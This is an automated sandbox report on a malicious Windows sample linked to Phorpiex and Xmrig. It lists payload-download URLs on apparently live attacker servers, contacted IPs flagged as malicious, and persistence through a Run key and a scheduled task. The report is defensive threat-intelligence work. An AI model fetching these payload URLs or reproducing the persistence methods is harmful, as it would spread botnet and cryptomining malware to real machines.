                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000001E.00000002.2891902429.0000025209421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.3020507274.0000015D80001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      http://185.215.113.66/tdrpl.exe2Us051y7j25.exe, 00000000.00000003.2341630604.00000000008EC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        http://185.215.113.84/U1091722296.exe, 0000001B.00000002.2814772306.0000000001253000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          http://91.202.233.141/ALLBSTATAASASD1146916724.exe, 0000001D.00000002.2876135463.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            http://185.215.113.66/tdrpl.exeLMEMUs051y7j25.exe, 00000000.00000003.2341074992.00000000008F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              http://nuget.org/NuGet.exepowershell.exe, 0000001E.00000002.2924839612.000002521948A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.3096620237.0000015D9006A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000023.00000002.3020507274.0000015D80229000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              http://185.215.113.66/1xsysppvrdnvs.exe, 00000004.00000003.2445858341.0000000000726000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000023.00000002.3020507274.0000015D80229000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                http://schemas.xmlsoap.org/soap/encoding/sysppvrdnvs.exe, 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmp, powershell.exe, 0000001E.00000002.2891902429.0000025209649000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.3020507274.0000015D80229000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000023.00000002.3020507274.0000015D80229000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  http://185.215.113.66/http://91.202.233.141/12345%s%s%s:Zone.Identifier%userprofile%%windir%%s21324.scr, 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 21324.scr, 00000003.00000000.2346481586.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 21324.scr, 00000003.00000003.2367229368.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000000.2367149756.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000012.00000000.2471335406.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpfalse
                                                                                                    unknown
                                                                                                    http://91.202.233.141/2MRsysppvrdnvs.exe, 00000004.00000002.3515115127.0000000000734000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      https://contoso.com/Iconpowershell.exe, 00000023.00000002.3096620237.0000015D9006A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://185.215.113.66/5sysppvrdnvs.exe, 00000004.00000002.3515115127.0000000000750000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.3515115127.0000000000719000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        unknown
                                                                                                        http://185.215.113.66/4sysppvrdnvs.exe, 00000004.00000002.3515115127.0000000000793000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.3515115127.0000000000734000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          http://185.215.113.66/5aR-sysppvrdnvs.exe, 00000004.00000002.3515115127.0000000000734000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            http://185.215.113.66/3sysppvrdnvs.exe, 00000004.00000002.3515115127.0000000000734000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              http://185.215.113.66/2sysppvrdnvs.exe, 00000004.00000002.3515115127.0000000000734000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.3515115127.0000000000719000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                unknown
                                                                                                                http://185.215.113.66/wsUs051y7j25.exe, 00000000.00000003.2341074992.00000000008F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  unknown
                                                                                                                  http://185.215.113.66/1FRsysppvrdnvs.exe, 00000004.00000003.2480886965.0000000000734000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.3515115127.0000000000734000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    unknown
                                                                                                                    http://185.215.113.66/1C:sysppvrdnvs.exe, 00000004.00000003.2480886965.0000000000734000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000003.2445858341.0000000000734000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      unknown
                                                                                                                      http://185.215.113.66/3_Rsysppvrdnvs.exe, 00000004.00000002.3515115127.0000000000734000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        unknown
                                                                                                                        https://github.com/Pester/Pesterpowershell.exe, 00000023.00000002.3020507274.0000015D80229000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          unknown
                                                                                                                          http://185.215.113.66/1sysppvrdnvs.exe, 00000004.00000003.2445858341.0000000000726000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000003.2480886965.0000000000734000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.3515115127.0000000000734000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000003.2445858341.0000000000734000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000003.2480886965.0000000000725000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.3515115127.0000000000719000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            http://185.215.113.66/1_Rsysppvrdnvs.exe, 00000004.00000003.2480886965.0000000000734000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              http://185.215.113.66/reg.php?s=%sMozilla/5.02314627202.exe, 0000001A.00000002.2688482531.0000000000872000.00000002.00000001.01000000.0000000A.sdmp, 2314627202.exe, 0000001A.00000000.2647768559.0000000000872000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                unknown
                                                                                                                                http://91.202.233.141//Rgsysppvrdnvs.exe, 00000004.00000002.3515115127.0000000000734000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  http://185.215.113.66/1tsysppvrdnvs.exe, 00000004.00000003.2445858341.0000000000726000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000003.2480886965.0000000000725000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    unknown
                                                                                                                                    http://91.202.233.141/4rsysppvrdnvs.exe, 00000004.00000002.3515115127.0000000000719000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      unknown
                                                                                                                                      http://185.215.113.66/tdrp.exe%s:Zone.Identifier/c21324.scr, 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 21324.scr, 00000003.00000000.2346481586.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 21324.scr, 00000003.00000003.2367229368.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000000.2367149756.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000012.00000000.2471335406.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        http://185.215.113.66/1tRsysppvrdnvs.exe, 00000004.00000003.2480886965.0000000000734000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.3515115127.0000000000734000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          unknown
                                                                                                                                          http://185.215.113.66/5C:sysppvrdnvs.exe, 00000004.00000002.3515115127.0000000000719000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            unknown
                                                                                                                                            http://185.215.113.84/nxmr.exeM1091722296.exe, 0000001B.00000002.2814772306.000000000123E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              unknown
                                                                                                                                              http://185.215.113.66/2zRsysppvrdnvs.exe, 00000004.00000002.3515115127.0000000000734000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                unknown
                                                                                                                                                http://185.215.113.84/1091722296.exe, 0000001B.00000002.2814772306.0000000001253000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  http://185.215.113.84/nxmr.exeF1091722296.exe, 0000001B.00000002.2814772306.000000000123E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    unknown
                                                                                                                                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000001E.00000002.2891902429.0000025209649000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.3020507274.0000015D80229000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    unknown
                                                                                                                                                    http://185.215.113.84/nxmr.exeH1091722296.exe, 0000001B.00000002.2814772306.000000000123E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      unknown
                                                                                                                                                      http://185.215.113.66/1$sysppvrdnvs.exe, 00000004.00000003.2445858341.0000000000726000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        unknown
                                                                                                                                                        https://xmrig.com/docs/algorithmswinupsecvmgr.exe, 00000022.00000002.3142710101.00007FF7AD1CB000.00000004.00000001.01000000.00000010.sdmpfalse
                                                                                                                                                          unknown
                                                                                                                                                          http://91.202.233.141/tographysysppvrdnvs.exe, 00000004.00000002.3515115127.00000000006D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            unknown
                                                                                                                                                            http://185.215.113.66/tdrpl.exelUs051y7j25.exe, 00000000.00000003.2341630604.00000000008EC000.00000004.00000020.00020000.00000000.sdmp, Us051y7j25.exe, 00000000.00000002.2346965220.00000000008EC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              unknown
                                                                                                                                                              https://aka.ms/pscore68powershell.exe, 0000001E.00000002.2891902429.0000025209421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.3020507274.0000015D80001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://185.215.113.66/tdrpl.exeC:Us051y7j25.exe, 00000000.00000003.2341698411.0000000000913000.00000004.00000020.00020000.00000000.sdmp, Us051y7j25.exe, 00000000.00000003.2341074992.000000000090E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                unknown
                                                                                                                                                                http://185.215.113.66/tdrpl.exenUs051y7j25.exe, 00000000.00000003.2341630604.00000000008DA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  http://185.215.113.66/tdrp.exesysppvrdnvs.exefalse
                                                                                                                                                                    unknown
                                                                                                                                                                    http://185.215.113.66/4MMC:sysppvrdnvs.exe, 00000004.00000002.3515115127.0000000000750000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      http://185.215.113.66/3405117-2476756634-1003$Us051y7j25.exe, 00000000.00000003.2341074992.00000000008F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        unknown
                                                                                                                                                                        http://185.215.113.66/2tsysppvrdnvs.exe, 00000004.00000002.3515115127.0000000000719000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                          • 75% < No. of IPs
                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                          185.215.113.66
                                                                                                                                                                          twizthash.netPortugal
                                                                                                                                                                          206894WHOLESALECONNECTIONSNLtrue
                                                                                                                                                                          198.163.192.16
                                                                                                                                                                          unknownUnited States
                                                                                                                                                                          7029WINDSTREAMUSfalse
                                                                                                                                                                          91.202.233.141
                                                                                                                                                                          unknownRussian Federation
                                                                                                                                                                          9009M247GBtrue
                                                                                                                                                                          90.156.162.125
                                                                                                                                                                          unknownRussian Federation
                                                                                                                                                                          25532MASTERHOST-ASMoscowRussiaRUfalse
                                                                                                                                                                          78.37.229.249
                                                                                                                                                                          unknownRussian Federation
                                                                                                                                                                          12389ROSTELECOM-ASRUfalse
                                                                                                                                                                          91.246.92.22
                                                                                                                                                                          unknownRussian Federation
                                                                                                                                                                          42673SKYWARE-ASPLtrue
                                                                                                                                                                          89.218.239.82
                                                                                                                                                                          unknownKazakhstan
                                                                                                                                                                          9198KAZTELECOM-ASKZfalse
                                                                                                                                                                          95.58.216.162
                                                                                                                                                                          unknownKazakhstan
                                                                                                                                                                          9198KAZTELECOM-ASKZfalse
                                                                                                                                                                          37.151.113.156
                                                                                                                                                                          unknownKazakhstan
                                                                                                                                                                          9198KAZTELECOM-ASKZfalse
                                                                                                                                                                          5.237.148.223
                                                                                                                                                                          unknownIran (ISLAMIC Republic Of)
                                                                                                                                                                          58224TCIIRfalse
                                                                                                                                                                          92.47.47.166
                                                                                                                                                                          unknownKazakhstan
                                                                                                                                                                          9198KAZTELECOM-ASKZfalse
                                                                                                                                                                          85.233.153.109
                                                                                                                                                                          unknownRussian Federation
                                                                                                                                                                          12389ROSTELECOM-ASRUtrue
                                                                                                                                                                          93.188.83.238
                                                                                                                                                                          unknownRussian Federation
                                                                                                                                                                          43746SAKH9-NETWORKRUtrue
                                                                                                                                                                          151.243.242.97
                                                                                                                                                                          unknownIran (ISLAMIC Republic Of)
                                                                                                                                                                          31549RASANAIRtrue
                                                                                                                                                                          59.91.192.122
                                                                                                                                                                          unknownIndia
                                                                                                                                                                          9829BSNL-NIBNationalInternetBackboneINfalse
                                                                                                                                                                          85.173.115.180
                                                                                                                                                                          unknownRussian Federation
                                                                                                                                                                          43132KBT-ASBranchformerKabbalktelecomRUtrue
                                                                                                                                                                          185.215.113.84
                                                                                                                                                                          unknownPortugal
                                                                                                                                                                          206894WHOLESALECONNECTIONSNLfalse
                                                                                                                                                                          178.91.91.225
                                                                                                                                                                          unknownKazakhstan
                                                                                                                                                                          9198KAZTELECOM-ASKZtrue
                                                                                                                                                                          90.156.163.121
                                                                                                                                                                          unknownRussian Federation
                                                                                                                                                                          25532MASTERHOST-ASMoscowRussiaRUtrue
                                                                                                                                                                          2.178.164.63
                                                                                                                                                                          unknownIran (ISLAMIC Republic Of)
                                                                                                                                                                          12880DCI-ASIRfalse
                                                                                                                                                                          94.158.52.97
                                                                                                                                                                          unknownUzbekistan
                                                                                                                                                                          43060IPLUS-ASUZtrue
                                                                                                                                                                          197.165.192.61
                                                                                                                                                                          unknownEgypt
                                                                                                                                                                          24863LINKdotNET-ASEGfalse
                                                                                                                                                                          94.183.35.46
                                                                                                                                                                          unknownIran (ISLAMIC Republic Of)
                                                                                                                                                                          31549RASANAIRfalse
                                                                                                                                                                          90.156.163.55
                                                                                                                                                                          unknownRussian Federation
                                                                                                                                                                          25532MASTERHOST-ASMoscowRussiaRUtrue
                                                                                                                                                                          213.230.97.241
                                                                                                                                                                          unknownUzbekistan
                                                                                                                                                                          8193BRM-ASUZtrue
                                                                                                                                                                          46.100.164.239
                                                                                                                                                                          unknownIran (ISLAMIC Republic Of)
                                                                                                                                                                          58224TCIIRtrue
                                                                                                                                                                          77.240.41.3
                                                                                                                                                                          unknownKazakhstan
                                                                                                                                                                          41371BIKADAKZtrue
                                                                                                                                                                          5.239.153.192
                                                                                                                                                                          unknownIran (ISLAMIC Republic Of)
                                                                                                                                                                          58224TCIIRfalse
                                                                                                                                                                          90.156.160.66
                                                                                                                                                                          unknownRussian Federation
                                                                                                                                                                          25532MASTERHOST-ASMoscowRussiaRUtrue
                                                                                                                                                                          178.22.171.158
                                                                                                                                                                          unknownKazakhstan
                                                                                                                                                                          41798TTC-ASJSCTranstelecomKZfalse
                                                                                                                                                                          213.206.45.227
                                                                                                                                                                          unknownUzbekistan
                                                                                                                                                                          29385BUZTON-JV-ASUZtrue
                                                                                                                                                                          239.255.255.250
                                                                                                                                                                          unknownReserved
                                                                                                                                                                          unknownunknownfalse
                                                                                                                                                                          78.39.234.9
                                                                                                                                                                          unknownIran (ISLAMIC Republic Of)
                                                                                                                                                                          58224TCIIRtrue
                                                                                                                                                                          62.209.135.143
                                                                                                                                                                          unknownUzbekistan
                                                                                                                                                                          34718TPSUZ-ASUZtrue
                                                                                                                                                                          2.181.31.167
                                                                                                                                                                          unknownIran (ISLAMIC Republic Of)
                                                                                                                                                                          58224TCIIRtrue
                                                                                                                                                                          94.230.230.211
                                                                                                                                                                          unknownUzbekistan
                                                                                                                                                                          29385BUZTON-JV-ASUZfalse
                                                                                                                                                                          80.191.218.209
                                                                                                                                                                          unknownIran (ISLAMIC Republic Of)
                                                                                                                                                                          58224TCIIRtrue
                                                                                                                                                                          88.151.180.214
                                                                                                                                                                          unknownKazakhstan
                                                                                                                                                                          41371BIKADAKZfalse
                                                                                                                                                                          188.212.80.105
                                                                                                                                                                          unknownIran (ISLAMIC Republic Of)
                                                                                                                                                                          58224TCIIRtrue
                                                                                                                                                                          88.204.242.226
                                                                                                                                                                          unknownKazakhstan
                                                                                                                                                                          9198KAZTELECOM-ASKZfalse
                                                                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                          Analysis ID:1542687
                                                                                                                                                                          Start date and time:2024-10-26 07:25:10 +02:00
                                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                                          Overall analysis duration:0h 10m 16s
                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                          Report type:full
                                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                          Number of analysed new started processes analysed:46
                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                                          Technologies:
                                                                                                                                                                          • HCA enabled
                                                                                                                                                                          • EGA enabled
                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                                          Sample name:Us051y7j25.exe
                                                                                                                                                                          renamed because original name is a hash value
                                                                                                                                                                          Original Sample Name:fdbf0c19ebcafcf5e4295edc9e4a37836ba580b9a4d63b2a9ccdf8418ed5fe84.exe
                                                                                                                                                                          Detection:MAL
                                                                                                                                                                          Classification:mal100.troj.evad.mine.winEXE@64/42@1/40
                                                                                                                                                                          EGA Information:
                                                                                                                                                                          • Successful, ratio: 64.3%
                                                                                                                                                                          HCA Information:
                                                                                                                                                                          • Successful, ratio: 75%
                                                                                                                                                                          • Number of executed functions: 89
                                                                                                                                                                          • Number of non-executed functions: 181
                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, schtasks.exe
                                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 20.109.209.108
                                                                                                                                                                          • Excluded domains from analysis (whitelisted): redir.update.msft.com.trafficmanager.net, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, www.update.microsoft.com, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                          • Execution Graph export aborted for target 1239611256.exe, PID 2052 because it is empty
                                                                                                                                                                          • Execution Graph export aborted for target powershell.exe, PID 3184 because it is empty
                                                                                                                                                                          • Execution Graph export aborted for target powershell.exe, PID 6432 because it is empty
                                                                                                                                                                          • Execution Graph export aborted for target winupsecvmgr.exe, PID 4044 because it is empty
                                                                                                                                                                          • Execution Graph export aborted for target winupsecvmgr.exe, PID 5352 because it is empty
                                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                          TimeTypeDescription
                                                                                                                                                                          01:26:33API Interceptor162980x Sleep call for process: sysppvrdnvs.exe modified
                                                                                                                                                                          01:26:33API Interceptor116x Sleep call for process: powershell.exe modified
                                                                                                                                                                          01:27:45API Interceptor135x Sleep call for process: conhost.exe modified
                                                                                                                                                                          07:26:31AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Windows Settings C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                          07:27:23Task SchedulerRun new task: Microsoft Windows Security path: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe
                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                          185.215.113.66thcdVit1dX.exeGet hashmaliciousPhorpiexBrowse
                                                                                                                                                                          • 185.215.113.66/3
                                                                                                                                                                          bBcZoComLl.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                                                                                          • 185.215.113.66/4
                                                                                                                                                                          file.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                                                                                          • 185.215.113.66/5
                                                                                                                                                                          dgiX55cHyU.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                                                                                          • 185.215.113.66/5
                                                                                                                                                                          GGXhCiYFBw.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                                                                                          • 185.215.113.66/5
                                                                                                                                                                          0NSjUT34gS.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                                                                                          • 185.215.113.66/5
                                                                                                                                                                          file.exeGet hashmaliciousPhorpiexBrowse
                                                                                                                                                                          • 185.215.113.66/3
                                                                                                                                                                          SecuriteInfo.com.Trojan.DownLoader46.2135.11116.25434.exeGet hashmaliciousPhorpiexBrowse
                                                                                                                                                                          • 185.215.113.66/2
                                                                                                                                                                          file.exeGet hashmaliciousPhorpiexBrowse
                                                                                                                                                                          • 185.215.113.66/6
                                                                                                                                                                          file.exeGet hashmaliciousPhorpiexBrowse
                                                                                                                                                                          • 185.215.113.66/1
                                                                                                                                                                          91.202.233.141thcdVit1dX.exeGet hashmaliciousPhorpiexBrowse
                                                                                                                                                                          • 91.202.233.141/dwntbl
                                                                                                                                                                          bBcZoComLl.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                                                                                          • 91.202.233.141/5
                                                                                                                                                                          file.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                                                                                          • 91.202.233.141/4
                                                                                                                                                                          dgiX55cHyU.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                                                                                          • 91.202.233.141/2
                                                                                                                                                                          GGXhCiYFBw.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                                                                                          • 91.202.233.141/4
                                                                                                                                                                          0NSjUT34gS.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                                                                                          • 91.202.233.141/1
                                                                                                                                                                          file.exeGet hashmaliciousPhorpiexBrowse
                                                                                                                                                                          • 91.202.233.141/5
                                                                                                                                                                          SecuriteInfo.com.Trojan.DownLoader46.2135.11116.25434.exeGet hashmaliciousPhorpiexBrowse
                                                                                                                                                                          • 91.202.233.141/5
                                                                                                                                                                          file.exeGet hashmaliciousPhorpiexBrowse
                                                                                                                                                                          • 91.202.233.141/6
                                                                                                                                                                          file.exeGet hashmaliciousPhorpiexBrowse
                                                                                                                                                                          • 91.202.233.141/5
                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                          s-part-0017.t-0009.t-msedge.netOndso1o6Yz.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                          • 13.107.246.45
                                                                                                                                                                          gEP8SOoakR.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 13.107.246.45
                                                                                                                                                                          file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                          • 13.107.246.45
                                                                                                                                                                          https://load.aberegg-immobilien.ch/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                          • 13.107.246.45
                                                                                                                                                                          file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                          • 13.107.246.45
                                                                                                                                                                          http://mychronictravel.eu.org/Get hashmaliciousUnknownBrowse
                                                                                                                                                                          • 13.107.246.45
